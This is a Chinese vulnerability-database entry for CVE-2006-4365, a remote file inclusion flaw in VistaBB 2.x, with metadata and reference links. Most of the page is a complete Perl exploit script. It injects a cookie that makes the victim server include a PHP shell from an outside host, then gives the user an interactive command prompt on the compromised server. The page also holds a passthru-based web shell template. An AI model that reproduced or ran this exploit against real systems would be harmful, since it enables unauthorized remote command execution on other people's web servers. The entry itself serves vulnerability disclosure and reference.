VistaBB多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110881 漏洞类型 输入验证
发布时间 2006-08-23 更新时间 2006-09-19
CVE编号 CVE-2006-4365 CNNVD-ID CNNVD-200608-436
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2251
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-436
|漏洞详情
VistaBB2.0.33及早期版本中存在多个PHP远程文件包含漏洞,远程攻击者可借助提交到(1)includes/functions_mod_user.php或(2)includes/functions_portal.php脚本中的phpbb_root_path参数中的URL来执行任意PHP代码。
|漏洞EXP
#!/usr/bin/perl
# Method found and exploit scripted by nukedx
# Contacts> ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN: nukedx@nukedx.com
# Original advisory can be found at: http://www.nukedx.com/?viewdoc=48
# 
# VistaBB <= 2.x Remote Command Execution Exploit
# 
# This exploit comes with it's own php shell setting. If you wanna change it your file must contain this data >
#
# <?php
# echo "_START_\n";
# ini_set("max_execution_time",0);
# error_reporting(0);
# passthru($_REQUEST[command]);
# echo "\n_END_";
# ?>
#
# Copyright 2006 (C) nukedx
#
# Greetz to: WW,xT,php from my team NWPX , str0ke , cha0s , Preddy , Yns , |SaMaN|, Caesar , Ogre and all of my  friends
use IO::Socket;
# Default configuration
$shell = "http://hometown.aol.com/yarivgiladi/sh.php";
# Checking user settings
if(@ARGV != 2) { usage(); }
else { exploit(); }
sub header()
{
  print "\n- NukedX Security Advisory Nr.2006-44\r\n";
  print "- VistaBB <= 2.x Remote Command Execution Exploit\r\n";
}
sub usage() 
{
  header();
  print "- Usage: $0 <host> <path>\r\n";
  print "- <host> -> Victim's host ex: www.victim.com\r\n";
  print "- <path> -> Path to VistaBB ex: /vistabb/ or just /\r\n";
  exit();
}
sub exploit() {
  # User variables
  $host = $ARGV[0];
  $host =~ s/(http:\/\/)//eg;
  $target = $ARGV[1]."includes/functions_mod_user.php";
  $good = 0;
  $c2s = "command=whoami";
  $c2slen = length($c2s);
  print "Trying to connect: $host\r\n";
  $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "Connection  failed...\r\n";
  print "Connected to victim: $host\r\n";
  print $sock "POST $target HTTP/1.1\n";
  print $sock "Host: $host\n";
  print $sock "Accept: */*\n";
  print $sock "Referer: $host\r\n";
  print $sock "Accept-Language: tr\r\n";
  print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
  print $sock "Accept-Encoding: gzip, deflate\r\n";
  print $sock "User-Agent: NukeZilla\r\n";
  print $sock "Cookie: phpbb_root_path=".$shell."?\r\n";
  print $sock "Content-length: $c2slen\r\n";
  print $sock "Connection: Keep-Alive\r\n";
  print $sock "Cache-Control: no-cache\r\n\r\n";
  print $sock $c2s;
  print $sock "\r\n\r\n";
  while($result = <$sock>)
  {
    if($result =~ /^_END_/)
    {
      $good=0;
      close($sock);
    }
    if($good==1)
    {
      if (!$whoami) {
        $whoami = trim($result);
        print "Logged as $whoami\r\nType exit for exit dont press ctrl+c\r\n";
      }
    }
    if ($good==0) 
    {
      if ($result =~ /Warning: include_once/) { print "Sorry victim is not vulnerable...\r\nClosing exploit...\r\n";sleep(3);exit(); }
    }
    if($result =~ /^_START_/)
    {
      $good=1;
    }
  }
  while()
  {
    print "[".$whoami."@".$host." /]\$ ";
    while(<STDIN>)
    {
      $cmds=$_;
      chomp($cmds);
      last;
    }
    if ($cmds =~ /^exit/) { print "Closing exploit...\r\n";sleep(3);exit(); }
    else { sendcmd(); }
  }
}
sub sendcmd () {
  $c2s = "command=".$cmds;
  $c2slen = length($c2s);
  $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "Connection lost...\r\n";
  print $sock "POST $target HTTP/1.1\n";
  print $sock "Host: $host\n";
  print $sock "Accept: */*\n";
  print $sock "Referer: $host\r\n";
  print $sock "Accept-Language: tr\r\n";
  print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
  print $sock "Accept-Encoding: gzip, deflate\r\n";
  print $sock "User-Agent: NukeZilla\r\n";
  print $sock "Cookie: phpbb_root_path=".$shell."?\r\n";
  print $sock "Content-length: $c2slen\r\n";
  print $sock "Connection: Keep-Alive\r\n";
  print $sock "Cache-Control: no-cache\r\n\r\n";
  print $sock $c2s;
  print $sock "\r\n\r\n";
  while($result = <$sock>)
  {
    if($result =~ /^_END_/)
    {
      $good=0;
      close($sock);
    }
    if($good==1)
    {
      print $result;
    }
    if ($good==0) 
    {
      if ($result =~ /Warning: include_once/) { print "Sorry victim is not vulnerable or patched!...\r\nClosing exploit...\r\n";sleep(3);exit(); }
    }
    if($result =~ /^_START_/)
    {
      $good=1;
    }
  }
}
sub trim($)
{
  	my $string = shift;
  	$string =~ s/^\s+//;
  	$string =~ s/\s+$//;
  	return $string;
} 

# nukedx.com [2006-08-24]

# milw0rm.com [2006-08-23]
|参考资料

来源:BID
名称:19685
链接:http://www.securityfocus.com/bid/19685
来源:MISC
链接:http://www.nukedx.com/?viewdoc=48
来源:MILW0RM
名称:2251
链接:http://www.milw0rm.com/exploits/2251
来源:VUPEN
名称:ADV-2006-3369
链接:http://www.frsirt.com/english/advisories/2006/3369
来源:SECUNIA
名称:21602
链接:http://secunia.com/advisories/21602
来源:FULLDISC
名称:20060824VistaBB<=2.xMultipleFileInclusion
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m=115641059002219&w=2
来源:OSVDB
名称:28141
链接:http://www.osvdb.org/28141
来源:OSVDB
名称:28140
链接:http://www.osvdb.org/28140
来源:MILW0RM
名称:2251
链接:http://milw0rm.com/exploits/2251